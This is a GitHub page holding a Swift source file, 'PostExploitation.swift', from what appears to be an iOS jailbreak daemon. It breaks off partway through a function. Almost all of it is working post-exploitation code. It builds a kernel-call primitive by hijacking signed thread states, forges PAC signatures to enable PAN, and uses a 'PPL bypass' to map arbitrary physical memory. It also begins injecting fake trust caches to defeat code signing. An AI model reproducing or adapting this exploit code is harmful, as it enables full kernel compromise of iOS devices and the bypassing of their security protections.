Skip to content
Permalink
d152c6116f
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
1837 lines (1517 sloc) 72.6 KB
//
// PostExploitation.swift
// jailbreakd
//
// Created by Linus Henze.
// Copyright © 2021 Linus Henze. All rights reserved.
//
import Foundation
import KernelExploit
import externalCStuff
import IOKit_iOS
import JailbreakUtils
class Logger {
static var logFileHandle: FileHandle?
static func print(_ s: String) {
NSLog("%@", s)
if logFileHandle != nil {
try? logFileHandle.unsafelyUnwrapped.write(contentsOf: (s + "\n").data(using: .utf8) ?? Data())
}
}
static func fmt(_ s: String, _ args: CVarArg...) {
print(String(format: s, arguments: args))
}
}
enum PostExploitationError: Error {
case taskForPidFailed
case taskSuspendFailed
case threadCreateFailed
case failedToFindProcs
case failedToFindContiguousRegion(pid: pid_t, port: mach_port_t)
case failedToObtainSignedState
case failedToFindKernelThread
case failedToFindLaunchd
case untetherNotInstalled
case failedToGetState
case failedToSetState
case noKernelThread
case failedToFindReturnState
case badPA
case badVA
case failedToFindMyProc
case failedToFindMyProcPMap
case failedToInjectTrustCache
case kernelOutOfMemory
case failedToExtractBootstrap
case launchctlCheckFailed
case failedToGetPortTable
}
let gKCallLock = NSLock()
class PostExploitation {
let mem: MemoryAccess
let offsets: Offsets.KernelOffsetsEntry
public private(set) var thisProc: Proc!
public private(set) var launchdProc: Proc!
public private(set) var kernelProc: Proc!
private var pmap_image4_trust_caches: UnsafeMutablePointer<Int64>!
struct CallThread {
let pid: pid_t // Child pid
let port: thread_t // Mach port for the thread
var signedState: Data // The signed kernel state
let userSignedState: Data // Some signed user state
let statePtr: UInt64 // Where to write the signed state to
let stateMapped: UInt64 // Pointer to mapped state
let returnStateTh: thread_t // Mach port for the thread which is used for return
let returnState: UInt64 // Pointer to the state of returnStateTh
var stackPtr: UInt64 // Some stack [changed once after the kcall gadget is set up]
var x22Ptr: UInt64 // Userspace pointer to x22 on the stack [assuming there is an exception frame]
}
var callThread: CallThread?
init() throws {
// Run setup first
try MemoryAccess.setup()
mem = try MemoryAccess()
offsets = mem.offsets
thisProc = Proc(self, addr: mem.thisProc)
kernelProc = Proc(self, addr: mem.kernelProc)
launchdProc = Proc(self, addr: mem.launchdProc)
// Also init krw support
// TODO(zhuowei): hack
// _ = initKrwSupport()
}
func slide(_ ptr: UInt64) -> UInt64 {
return ptr + mem.kernelSlide
}
func calculateThreadStateAdjust(fromData data: Data, andFaultAddr faultAddr: UInt64) -> UInt? {
print("calculateThreadStateAdjust")
let nItems = ((data.count - 0x188) >> 3)
for i in 0..<nItems {
let off = UInt(i * 8)
// Check signature (thread state type + size)
let sig = data.getGeneric(type: UInt64.self, offset: off)
if sig == 0x4A00000015 {
// Check neon registers
let s1 = data.getGeneric(type: UInt64.self, offset: off + 0x150)
let s2 = data.getGeneric(type: UInt64.self, offset: off + 0x160)
let s3 = data.getGeneric(type: UInt64.self, offset: off + 0x170)
let s4 = data.getGeneric(type: UInt64.self, offset: off + 0x180)
if s1 == 0x42424242, s2 == 0x43434343, s3 == 0x44444444, s4 == 0x45454545 {
// Looks good, check far
let far = data.getGeneric(type: UInt64.self, offset: off + 0x118)
if far == faultAddr {
// This seems to be it!
return off
}
}
}
}
print("no sig")
return nil
}
func getThread(forTask task: task_t, proc: Proc) -> (thread_t, Thread)? {
// First, we have to find the addresses of the current threads
// so we can later find out which one is the new one
var oldThs: [UInt64] = []
var curTh = proc.task?.thread
while curTh != nil {
//print("curTh = \(curTh.unsafelyUnwrapped.addr)")
if curTh.unsafelyUnwrapped.addr < 0x10000000 {
break // TODO(zhuowei): WHAT???
}
oldThs.append(curTh.unsafelyUnwrapped.addr)
curTh = curTh.unsafelyUnwrapped.next
}
// Create the new thread
var thPort: thread_t = 0
guard thread_create(task, &thPort) == KERN_SUCCESS else {
Logger.print("[getThread] thread_create failed, this should not happen!")
return nil
}
// Find the newly created thread
curTh = proc.task?.thread
while curTh != nil && oldThs.contains(curTh.unsafelyUnwrapped.addr) {
if curTh.unsafelyUnwrapped.addr < 0x10000000 {
break // TODO(zhuowei): WHAT???
}
curTh = curTh.unsafelyUnwrapped.next
}
guard curTh != nil else {
Logger.print("[getThread] curTh == nil -- Offsets are wrong!")
return nil
}
return (thPort, curTh.unsafelyUnwrapped)
}
func createExploitMem() -> UInt64 {
var addr: vm_address_t = 0
vm_allocate(mach_task_self_, &addr, 0x8000, VM_FLAGS_ANYWHERE)
vm_protect(mach_task_self_, addr, 0x4000, 1, VM_PROT_READ | VM_PROT_WRITE)
vm_protect(mach_task_self_, addr + 0x4000, 0x4000, 1, VM_PROT_NONE)
return UInt64(addr) + 0x3FF0
}
/*
* Setup kernel call primitive.
*/
private func _setupKernelCall() throws {
// Fork to get a new task
// We will abuse it's threads
typealias fType = @convention(c) () -> pid_t
let fork = unsafeBitCast(dlsym(dlopen(nil, 0), "fork"), to: fType.self)
let child = fork()
if child == 0 {
while true {
sleep(100)
}
}
// Get task port for the task
var chPort: mach_port_t = 0
guard task_for_pid(mach_task_self_, child, &chPort) == 0 else {
Logger.print("task_for_pid failed!")
throw PostExploitationError.taskForPidFailed
}
var killChild = true
defer {
if killChild {
// Make sure to terminate child if we failed
task_terminate(chPort)
kill(child, SIGKILL)
waitpid(child, nil, 0)
}
}
// Task shouldn't be running
guard task_suspend(chPort) == 0 else {
Logger.print("Failed to suspend child!")
throw PostExploitationError.taskSuspendFailed
}
// Find child proc
var cur: Proc! = Proc.getFirstProc(pe: self)
var childProc: Proc?
while cur != nil {
if cur.pid == child {
childProc = cur
break
}
cur = cur.next
}
guard childProc != nil else {
// ???
throw PostExploitationError.failedToFindProcs
}
Logger.print("Creating threads...")
// Create many threads
var initState = arm_thread_state64_t()
initState.__pc = UInt64(UInt(bitPattern: dlsym(dlopen(nil, 0), "userReturn")))
var thList: [thread_t] = []
for _ in 0..<500 {
var thPort: thread_t = 0
var kr = thread_create(chPort, &thPort)
guard kr == 0 else {
Logger.print("Failed to create thread!")
throw PostExploitationError.threadCreateFailed
}
let cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: initState) >> 2)
kr = withUnsafeMutablePointer(to: &initState) { ptr -> kern_return_t in
return thread_set_state(thPort, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
Logger.print("Failed to set thread state!")
throw PostExploitationError.threadCreateFailed
}
thList.append(thPort)
}
Logger.print("Threads created")
// Loop over threads
// Find addresses of their contexts
var kAddrs: [UInt64] = []
var curTh = childProc!.task!.thread
for _ in 0..<(thList.count-1) {
let a = try mem.r64(virt: curTh.unsafelyUnwrapped.addr + offsets.threadStruct.contextOffset)
kAddrs.append(a)
curTh = curTh.unsafelyUnwrapped.next
}
kAddrs.sort()
Logger.print("Finding contiguous region...")
// Find a contiguous region
// i.e. threads whoses states are contiguous
var found = false
var regionStart: UInt64 = 0
var foundCnt = 0
for i in 0..<(kAddrs.count-1) {
if (kAddrs[i+1] - kAddrs[i]) != 0x350 {
regionStart = 0
foundCnt = 0
} else {
if regionStart == 0 {
regionStart = kAddrs[i]
foundCnt = 1
} else if (foundCnt + 1) == 18 {
found = true
break
} else {
foundCnt += 1
}
}
}
if !found {
Logger.print("Failed to find a contiguous region!")
killChild = false // Will be done later by the wrapper function
throw PostExploitationError.failedToFindContiguousRegion(pid: child, port: chPort)
}
// Calculate end
let regionEnd = regionStart + 0x3EF0
Logger.fmt("Contiguous region %p - %p", regionStart, regionEnd)
// Loop over all threads again to find out
// where the userspace regs are located
curTh = childProc!.task!.thread
var userStatePtrs: [(UInt64, Thread)] = []
for _ in 0..<500 {
let a = try mem.rPtr(virt: curTh.unsafelyUnwrapped.addr + offsets.threadStruct.contextOffset + 0x8)
if a > regionStart && a < regionEnd {
userStatePtrs.append((a, curTh.unsafelyUnwrapped))
}
curTh = curTh.unsafelyUnwrapped.next
}
// Sort and get second to last so we have enough space on the
// kernel stack
userStatePtrs.sort(by: { $0.0 < $1.0 })
let targetThread = userStatePtrs[userStatePtrs.count - 3]
let targetState = targetThread.0
Logger.fmt("Will target state @ %p", targetState)
let userSignedState = try mem.readBytes(virt: targetThread.0, count: 0x350)
// Create a backup of the contiguous region
let backup = try mem.readBytes(virt: regionStart, count: 0x3BA0)
// Clear contiguous region
try mem.writeBytes(virt: regionStart, data: Data(repeating: 0, count: 0x3BA0))
// Create a new thread (used for finding the correct offset)
guard let signOffsetGetterTh = getThread(forTask: mach_task_self_, proc: thisProc.unsafelyUnwrapped) else {
throw PostExploitationError.threadCreateFailed
}
try mem.writeBytes(virt: regionStart, data: backup)
// Map it's thread struct into our process
// Assumption: Thread structs will never cross a page boundary
//var threadStructPage = try mem.virt2phys(signOffsetGetterTh.1.addr & ~0x3FFF)
var threadStructOffset = signOffsetGetterTh.1.addr & 0x3FFF
//var threadStructMapped = try mem.unsafeMapAddress(phys: threadStructPage, size: 0x4000) + ///threadStructOffset
// zhuowei: all right, give me a control page.
let controlPage = UnsafeMutableRawBufferPointer.allocate(byteCount: 0x4000, alignment: 2)
// zhuowei: sync sync sync
// Set it's state
var state = arm_thread_state64_t()
state.__pc = UInt64(UInt(bitPattern: dlsym(dlopen(nil, 0), "doMagic")))
state.__x.21 = UInt64(UInt(bitPattern: controlPage.baseAddress!)) // threadStructMapped
state.__x.22 = targetState
state.__x.23 = createExploitMem()
state.__x.24 = offsets.threadStruct.kStackPtrOffset
state.__sp = UInt64(UInt(bitPattern: valloc(0x4000))) + 0x4000 - 0x10
let cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
var signedStateOffset: UInt!
var before: UInt64 = 0
var kData = Data()
for _ in 0..<50 {
let kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(signOffsetGetterTh.0, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
Logger.print("Failed to setup thread!")
throw PostExploitationError.threadCreateFailed
}
Logger.print("Resuming thread")
// we don't have structs mapped, so we need to do this ourselves.
// set this to 0x61 (thread not started yet)
controlPage[0] = 0x61
// Swift turns this into an infinite loop without this.
// I know this is wrong, but making threads synchronize properly is too hard
OSMemoryBarrier()
// Wait for thread to do it's magic
// XXX: Shitty detection logic
before = try mem.r64(virt: state.__x.22 - 0x8)
thread_resume(signOffsetGetterTh.0)
print("resumed thread")
while controlPage[0] != 0x62 {
// wait for the thread to start.
// when it starts, it pokes 0x62 to signal it's ready.
OSMemoryBarrier()
}
print("writing")
let kStackPtrPtrForThisThread = signOffsetGetterTh.1.addr + offsets.threadStruct.kStackPtrOffset
// set kernel stack to targetState
try mem.w64(virt: kStackPtrPtrForThisThread, data: state.__x.22)
controlPage[0] = 0x63;
OSMemoryBarrier()
while try mem.r64(virt: state.__x.22 - 0x8) == before { }
// Sleep for a bit
usleep(10000)
Logger.print("Thread should be done now")
// restore the original ptr
// try mem.w64(virt: kStackPtrPtrForThisThread, data: originalStackPtr)
// Read kernel data
kData = try mem.readBytes(virt: targetState & ~0x3FFF, count: 0x4000)
// Try to find the offset
signedStateOffset = calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10)
if signedStateOffset == nil {
// Maybe the thread isn't done yet?
// Sleep a bit more, then retry
for i in 0..<1 {
//Logger.print("Thread wasn't done? Trying again (try \(i+1) of 3)")
usleep(100000)
kData = try mem.readBytes(virt: targetState & ~0x3FFF, count: 0x4000)
signedStateOffset = calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10)
if signedStateOffset != nil {
break
}
}
guard signedStateOffset != nil else {
Logger.print("Nope, trying again")
continue
}
}
break
}
guard signedStateOffset != nil else {
Logger.print("Exploit is broken...")
thread_terminate(signOffsetGetterTh.0)
throw PostExploitationError.failedToObtainSignedState
}
Logger.fmt("Offset for exploitation: %p", signedStateOffset)
// Create a new thread to obtain the signed state
guard let signTh = getThread(forTask: mach_task_self_, proc: thisProc.unsafelyUnwrapped) else {
throw PostExploitationError.threadCreateFailed
}
// Kill the thread, zero memory and retry with the correct offset
// Suspend and set offset
thread_terminate(signOffsetGetterTh.0)
print("ok, about to do the obtaining")
sleep(1)
// Zero contiguous region again
try mem.writeBytes(virt: regionStart, data: Data(repeating: 0, count: 0x3BA0))
// Map it's thread struct
//threadStructPage = try mem.virt2phys(signTh.1.addr & ~0x3FFF)
threadStructOffset = signTh.1.addr & 0x3FFF
//threadStructMapped = try mem.unsafeMapAddress(phys: threadStructPage, size: 0x4000) + threadStructOffset
// Set state
let targetStateOff = UInt(targetState - regionStart)
state.__x.21 = UInt64(UInt(bitPattern: controlPage.baseAddress!)) // threadStructMapped
state.__x.22 = targetState + UInt64(targetStateOff - signedStateOffset)
guard state.__x.22 > regionStart && state.__x.22 < regionEnd else {
Logger.print("Offset to obtain signed state is bad: Outside the region")
throw PostExploitationError.failedToObtainSignedState
}
var canContinue = false
for _ in 0..<50 {
let kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(signTh.0, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
Logger.print("Failed to change thread!")
throw PostExploitationError.failedToObtainSignedState
}
//Logger.print("Attempting to obtain signed state")
// Retry
controlPage[0] = 0x61
OSMemoryBarrier()
// XXX: Shitty detection logic
before = try mem.r64(virt: state.__x.22 - 0x8)
thread_resume(signTh.0)
while controlPage[0] != 0x62 {
// wait for the thread to start.
// when it starts, it pokes 0x62 to signal it's ready.
OSMemoryBarrier()
}
let kStackPtrPtrForThisThread = signTh.1.addr + offsets.threadStruct.kStackPtrOffset
// set kernel stack to targetState
try mem.w64(virt: kStackPtrPtrForThisThread, data: state.__x.22)
controlPage[0] = 0x63;
OSMemoryBarrier()
while try mem.r64(virt: state.__x.22 - 0x8) == before { }
// Sleep for a bit
usleep(10000)
//Logger.print("Thread should be done now")
// Read and check the state
// First check that the offsets match
kData = try mem.readBytes(virt: targetState & ~0x3FFF, count: 0x4000)
if calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10) ?? 0 != targetStateOff {
// Maybe the thread isn't done yet?
// Sleep a bit more, then retry
var ok = false
for i in 0..<1 {
//Logger.print("Thread wasn't done? Trying again (try \(i+1) of 3)")
usleep(100000)
if calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10) ?? 0 == targetStateOff {
ok = true
break
}
}
guard ok else {
//Logger.print("Nope, trying again")
continue
}
}
canContinue = true
break
}
thread_terminate(signTh.0)
guard canContinue else {
Logger.print("Exploit is broken...")
Logger.fmt("%p", calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10) ?? 0x1337)
throw PostExploitationError.failedToObtainSignedState
}
// Now check cpsr
// Should be EL1, without the IL bit set
// iPhone 12 apparently uses EL2?
let cpsr = kData.getGeneric(type: UInt32.self, offset: targetStateOff + 0x110)
guard (cpsr & 0x100004) == 0x4 || (cpsr & 0x100008) == 0x8 else {
Logger.fmt("CPSR is wrong! Read: %d", cpsr)
throw PostExploitationError.failedToObtainSignedState
}
// Should be ok now
// Restore backup
try mem.writeBytes(virt: regionStart, data: backup)
// Write signed state
let signedState = kData[targetStateOff..<(targetStateOff+0x350)]
let statePtr = regionStart + UInt64(targetStateOff)
try mem.writeBytes(virt: statePtr, data: signedState)
Logger.print("Obtained signed kernel state!")
print("ok, we made it!")
sleep(1)
// Now find the thread which can be used to execute kernel code
for th in thList {
var state = arm_thread_state64_t()
var cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
var kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_get_state(th, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), &cnt)
}
guard kr == 0 else {
continue
}
// iPhone 12 is using EL2?
if (state.__cpsr & 0x4) == 0x4 || (state.__cpsr & 0x8) == 0x8 {
// Got it!
Logger.print("Found magic thread!")
Logger.print("Attempting to set other registers...")
state.__x.0 = 0x414243440000
state.__x.1 = 0x414243440100
state.__x.2 = 0x414243440200
state.__x.3 = 0x414243440300
state.__x.4 = 0x414243440400
state.__x.5 = 0x414243440500
state.__x.6 = 0x414243440600
state.__x.7 = 0x414243440700
state.__x.8 = 0x414243440800
state.__x.9 = 0x414243440900
state.__x.10 = 0x414243440A00
state.__x.11 = 0x414243440B00
state.__x.12 = 0x414243440C00
state.__x.13 = 0x414243440D00
state.__x.14 = 0x414243440E00
state.__x.15 = 0x414243440F00
state.__x.16 = 0x414243441000
state.__x.17 = 0x414243441100
state.__x.18 = 0x414243441200
state.__x.19 = 0x414243441300
state.__x.20 = 0x414243441400
state.__x.21 = 0x414243441500
state.__x.22 = 0x414243441600
state.__x.23 = 0x414243441700
state.__x.24 = 0x414243441800
state.__x.25 = 0x414243441900
state.__x.26 = 0x414243441A00
state.__x.27 = 0x414243441B00
state.__x.28 = 0x414243441C00
state.__fp = 0x414243441D00
state.__lr = 0x414243441E00
state.__sp = 0x414243441F00
state.__pc = 0x414243442000
Logger.print("Writing state...")
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(th, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
Logger.fmt("thread_set_state returned %d", kr)
if kr == KERN_SUCCESS {
// Create a new thread
// We will use it's user state
guard let userStateTh = getThread(forTask: chPort, proc: childProc.unsafelyUnwrapped) else {
Logger.print("Failed to create user state thread!")
throw PostExploitationError.threadCreateFailed
}
// Set it's state to our loop function
state.__pc = UInt64(UInt(bitPattern: dlsym(dlopen(nil, 0), "userReturn")))
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(userStateTh.0, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == KERN_SUCCESS else {
Logger.print("Failed to set state of user state thread!")
throw PostExploitationError.failedToSetState
}
// Map x22 (on the stack, exception frame)
var stackX22 = statePtr - 0x6A0 + 0xB8
var stackX22Page = stackX22 & ~0x3FFF
var stackX22Off = stackX22 & 0x3FFF
var x22Ptr = stackX22 // try mem.unsafeMapAddress(phys: mem.virt2phys(stackX22Page), size: 0x4000) + stackX22Off
// Map signed state
let sStatePage = statePtr & ~0x3FFF
let sStateOff = statePtr & 0x3FFF
let sStateMp = statePtr // try mem.unsafeMapAddress(phys: mem.virt2phys(sStatePage), size: 0x4000) + sStateOff
callThread = CallThread(pid: child, port: th, signedState: signedState, userSignedState: userSignedState, statePtr: statePtr, stateMapped: sStateMp, returnStateTh: userStateTh.0, returnState: try mem.rPtr(virt: userStateTh.1.addr + offsets.threadStruct.contextOffset + 0x8), stackPtr: statePtr - 0x350, x22Ptr: x22Ptr)
// Resume the other task so we can actually use kcall
task_resume(chPort)
killChild = false
// Now use the call gadget to get a real kernel stack
let stack = try kcall(function: slide(offsets.functions.kalloc), p1: 0x8000) + 0x7FF0
callThread!.stackPtr = stack
Logger.fmt("Allocated real kernel stack @ %p", stack)
// Change the x22 pointer
stackX22 = stack - 0x350 + 0xB8
stackX22Page = stackX22 & ~0x3FFF
stackX22Off = stackX22 & 0x3FFF
x22Ptr = stackX22 // try mem.unsafeMapAddress(phys: mem.virt2phys(stackX22Page), size: 0x4000) + stackX22Off
callThread!.x22Ptr = x22Ptr
// Kill any remaining threads
var threadList: thread_act_array_t?
var thCount: mach_msg_type_number_t = 0
if task_threads(chPort, &threadList, &thCount) == KERN_SUCCESS {
for i in 0..<Int(thCount) {
let other = threadList![i]
if other != th && other != userStateTh.0 {
thread_suspend(other)
thread_abort(other)
thread_terminate(other)
}
}
}
vm_deallocate(mach_task_self_, UInt(bitPattern: threadList), vm_size_t(MemoryLayout<thread_act_t>.size * Int(thCount)))
// Done!
return
}
}
}
throw PostExploitationError.failedToFindKernelThread
}
func kernelCallEnablePAN() throws {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
guard let callThread = self.callThread else {
throw PostExploitationError.noKernelThread
}
// Restore signed state first
try mem.writeBytes(virt: callThread.statePtr, data: callThread.signedState)
// We just use the internal _kcall function which allows passing a callback
// The callback will be invoked after the call but before the thread returns
// Just copy the jophash while the thread hangs in the kernel
//let cpsrPointer = UnsafeMutablePointer<UInt64>(bitPattern: UInt(callThread.stateMapped) + 0x110)!
//let origCPSR = cpsrPointer.pointee
let cpsrKernelPointer = callThread.stateMapped + 0x110
let origCPSR = try mem.r64(virt: cpsrKernelPointer)
print(String(format: "orig CPSR: %lx", origCPSR))
var state = arm_thread_state64_t()
state.__x.0 = callThread.statePtr
state.__x.1 = 0 // pc
state.__x.2 = origCPSR | 0x400000 // cpsr, with PAN enabled
state.__x.3 = 0 // lr
state.__x.4 = 0 // x16
state.__x.5 = 0 // x17
var jopHash: UInt64 = 0
_ = try _kcall(function: slide(offsets.functions.ml_sign_thread_state), state: state, x1out: &jopHash)
// Okay, now we only have to apply our changes to the signedState data object
self.callThread!.signedState.withUnsafeMutableBytes { ptr in
let base = ptr.baseAddress!
// Write pc, cpsr, lr, x16, x17
base.advanced(by: 0x108).assumingMemoryBound(to: UInt64.self).pointee = 0 // pc
base.advanced(by: 0x110).assumingMemoryBound(to: UInt64.self).pointee = origCPSR | 0x400000
base.advanced(by: 0x0F8).assumingMemoryBound(to: UInt64.self).pointee = 0 // lr
base.advanced(by: 0x088).assumingMemoryBound(to: UInt64.self).pointee = 0 // x16
base.advanced(by: 0x090).assumingMemoryBound(to: UInt64.self).pointee = 0 // x17
base.advanced(by: 0x128).assumingMemoryBound(to: UInt64.self).pointee = jopHash
}
}
func setupKernelCall() -> Bool {
if callThread != nil {
return true
}
// Try up to 5 times
var failed: [(pid_t, mach_port_t)] = []
var ctr = 0
var res = false
let maxCount = 1
while ctr < maxCount {
do {
try _setupKernelCall()
res = true
break
} catch PostExploitationError.failedToFindContiguousRegion(pid: let pid, port: let port) {
// Ignore this error
// It might happen a few times before succeeding
failed.append((pid, port))
continue
} catch let e {
Logger.print("Error: _setupKernelCall: \(e)")
ctr += 1
}
}
// Terminate all the failed children
for f in failed {
task_resume(f.1)
task_terminate(f.1)
kill(f.0, SIGKILL)
waitpid(f.0, nil, 0)
}
if res {
// Enable PAN, to prevent panic'ing when something enables interrupts
do {
try kernelCallEnablePAN()
} catch let e {
Logger.print("Error: kernelCallEnablePAN: \(e)")
res = false
}
// zhuowei: pacia
do {
try setupPaciaBadly()
} catch let e {
Logger.print("Error: setupPaciaBadly: \(e)")
}
}
return res
}
func deinitKernelCall() {
if let ct = callThread {
callThread = nil
task_terminate(ct.port)
kill(ct.pid, SIGKILL)
waitpid(ct.pid, nil, 0)
}
}
func _kcall(function: UInt64, state: arm_thread_state64_t, x1out: UnsafeMutablePointer<UInt64>? = nil, dontTouchMyGarbage: Bool = false) throws -> UInt64 {
gKCallLock.lock()
defer { gKCallLock.unlock() }
print("doing a _kcall!")
guard let callThread = self.callThread else {
throw PostExploitationError.noKernelThread
}
// Restore state first
try mem.writeBytes(virt: callThread.statePtr, data: callThread.signedState)
// Also clear x22, pc on the stack
try mem.w64(virt: callThread.stackPtr - 0x350 + 0xB8, data: 0)
try mem.w64(virt: callThread.stackPtr - 0x350 + 0x108, data: 0)
// Now build new state
var state = state
let brX22Gadget = slide(offsets.functions.brX22)
if !dontTouchMyGarbage {
// Setup the state so that the thread will loop
state.__lr = brX22Gadget
state.__pc = function
state.__sp = callThread.stackPtr
state.__x.21 = callThread.returnState
state.__x.22 = brX22Gadget
}
let cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
let kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
throw PostExploitationError.failedToSetState
}
let x0Ptr = callThread.x22Ptr - 0xB0
let x1Ptr = callThread.x22Ptr - 0xA8
let x22Ptr = callThread.x22Ptr
let pcPtr = callThread.x22Ptr + 0x50
let x23UsrPtr = callThread.stateMapped + 0xC0
usleep(1000)
thread_resume(callThread.port)
// Wait for the pointer to appear
while true {
let theVal = try mem.r64(virt: pcPtr)
if theVal != brX22Gadget {
print(String(format: "waiting: %lx %lx", theVal, brX22Gadget))
usleep(1000)
} else {
break
}
}
// Wait for the thread to return
let exc_return = slide(offsets.functions.exception_return)
while true {
try mem.w64(virt: x22Ptr, data: exc_return)
if try mem.r64(virt: x23UsrPtr) == 0x12345678 {
break
}
usleep(1000)
}
thread_suspend(callThread.port)
if let x1out = x1out {
x1out.pointee = try mem.r64(virt: x1Ptr)
}
// Get x0
return try mem.r64(virt: x0Ptr)
}
func kcall(function: UInt64, p1: UInt64 = 0, p2: UInt64 = 0, p3: UInt64 = 0, p4: UInt64 = 0, p5: UInt64 = 0, p6: UInt64 = 0, p7: UInt64 = 0, p8: UInt64 = 0) throws -> UInt64 {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
var state = arm_thread_state64_t()
state.__x.0 = p1
state.__x.1 = p2
state.__x.2 = p3
state.__x.3 = p4
state.__x.4 = p5
state.__x.5 = p6
state.__x.6 = p7
state.__x.7 = p8
return try _kcall(function: function, state: state)
}
/*
* kcall without return value.
*/
func kcall_oneshot(function: UInt64, p1: UInt64 = 0, p2: UInt64 = 0, p3: UInt64 = 0, p4: UInt64 = 0, p5: UInt64 = 0, p6: UInt64 = 0, p7: UInt64 = 0, p8: UInt64 = 0) throws -> Void {
gKCallLock.lock()
defer { gKCallLock.unlock() }
guard let callThread = self.callThread else {
throw PostExploitationError.noKernelThread
}
// Restore state first
try mem.writeBytes(virt: callThread.statePtr, data: callThread.signedState)
// Now build new state
var state = arm_thread_state64_t()
var cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
var kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_get_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), &cnt)
}
guard kr == 0 else {
throw PostExploitationError.failedToGetState
}
// Setup the state
state.__lr = slide(offsets.functions.exception_return)
state.__pc = function
state.__sp = callThread.stackPtr
state.__x.0 = p1
state.__x.1 = p2
state.__x.2 = p3
state.__x.3 = p4
state.__x.4 = p5
state.__x.5 = p6
state.__x.6 = p7
state.__x.7 = p8
state.__x.21 = callThread.returnState
cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
throw PostExploitationError.failedToSetState
}
usleep(1000)
thread_resume(callThread.port)
// Wait for the thread
while true {
cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_get_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), &cnt)
}
guard kr == 0 else {
continue
}
if state.__x.23 == 0x12345678 {
break
}
}
thread_suspend(callThread.port)
}
/**
* PPL bypass: Map any phys page ;)
*/
func pmapMapPA(pmap: UInt64, pa: UInt64, va: UInt64) throws -> UInt64 {
// PPL bypass: If pa contains extra [high] bits, they will be ignored
// Additionally, all checks are bypassed
// Set bit 63
let pa = pa | (1 << 63)
// Safety check: pa and va *must* be pages
guard (pa & 0x3FFF) == 0 else {
throw PostExploitationError.badPA
}
guard (va & 0x3FFF) == 0 else {
throw PostExploitationError.badVA
}
// Now call pmap_enter_options_addr
let prot = UInt64(VM_PROT_READ | VM_PROT_WRITE)
let fault_type: UInt64 = 0
let flags: UInt64 = 0
let wired: UInt64 = 1
let options: UInt64 = 1
while true {
let res = try kcall(function: slide(offsets.functions.pmap_enter_options_addr), p1: pmap, p2: va, p3: pa, p4: prot, p5: fault_type, p6: flags, p7: wired, p8: options)
if res != KERN_RESOURCE_SHORTAGE {
return res
}
}
}
/*
* Injects a new *empty* trust cache.
* The trust cache has the number of entries specified.
* All the entries are set to random values.
*/
func injectEmptyTrustCache(space: UInt32) throws -> UInt64 {
#if false
if pmap_image4_trust_caches == nil {
// Get pmap
let pmap: Pmap! = thisProc.unsafelyUnwrapped.task?.vmMap?.pmap
guard pmap != nil else {
throw PostExploitationError.failedToFindMyProcPMap
}
// Map PPL (for pmap_image4_trust_caches)
let tcPtrVirt = slide(offsets.loadedTCRoot)
let tcVirtPage = tcPtrVirt & ~0x3FFF
let tcOff = tcPtrVirt & 0x3FFF
let tcPhysPage = try mem.virt2phys(tcVirtPage)
let mapRes = try pmapMapPA(pmap: pmap.addr, pa: tcPhysPage, va: 0x41420000)
guard mapRes == KERN_SUCCESS else {
Logger.fmt("Result: %d", mapRes)
throw PostExploitationError.failedToInjectTrustCache
}
pmap_image4_trust_caches = UnsafeMutablePointer<Int64>(bitPattern: UInt(0x41420000 + tcOff))!
}
// Build our trust cache
let sz = 0x10 + 0x18 + (UInt64(space) * 22)
let buf = try kcall(function: slide(offsets.functions.kalloc), p1: sz)
guard buf != 0 else {
throw PostExploitationError.kernelOutOfMemory
}
let listEntry = buf
let ourTc = buf + 0x10
// List entry must point to our trust cache
try mem.w64(virt: listEntry + 0x8, data: ourTc)
// Setup tc
// 0x0 -> Version
// 0x4 -> UUID (16 bytes)
// 0x14 -> Number of entries
try mem.w32(virt: ourTc, data: 1)
